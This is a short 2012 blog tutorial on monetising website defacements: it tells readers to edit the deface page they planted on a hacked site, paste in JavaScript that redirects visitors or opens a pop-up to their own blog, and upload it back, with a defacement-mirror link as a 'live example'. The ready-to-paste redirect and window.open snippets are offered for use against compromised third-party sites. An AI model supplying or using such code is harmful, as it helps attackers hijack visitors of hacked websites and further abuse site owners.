Thursday, August 30, 2012

How To Redirect A Website On Your Own Website

When Your Have Low Traffic on website/blog You can Get Traffic from Your defacedwebsite. Just redirect the Defaced website on your Main website.


301-redirect.png (200×200)



How To Redirect Defaced Website On your Website???


For Redirecting hacked website to your website open the deface Page with Notepad And paste this code Anywhere, But closed the <> Properly


Code :- 
</SCRIPT><script> delayRedirect(' http://blog.itfete.com/ '); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script> 


(replace devilscafe.in with your own website)


Example :- 


<html><title>--==[[ Hacked By ABC  ]]==--</title> 


Find this code in Your deface page and Paste the code just after This code 


Example :- 


<html><title>--==[[ Hacked By ABC  ]]==--</title></SCRIPT><script> delayRedirect(' http://blog.itfete.com/ '); function delayRedirect(url) { var Timeout = setTimeout("window.location='" + url + "'",100000); }</script>

pharming.jpg (480×261)Now save The Deface page and Upload on Defacedwebsite :) The website will be redirect on your website !


See Live example of redirecting :-


http://legend-h.org/mirror/224785/fullaventura.com/jaihind.html

How To Add A Pop Up and Open Your website in a New window


If you want to Open Your website In a New Window (Pop-up) Paste this code 
<script language="javascript">
window.open('http://blog.itfete.com/','','width=700,height=600')

</script> after  </title> 


Example :- 


<html><title>--==[[ Hacked By ABC  ]]==--</title> <script language="javascript">
window.open(' http://blog.itfete.com/','','width=700,height=600')
</script>




Dont Forgot to leave a Comment if you Like this ;)

No comments:

Post a Comment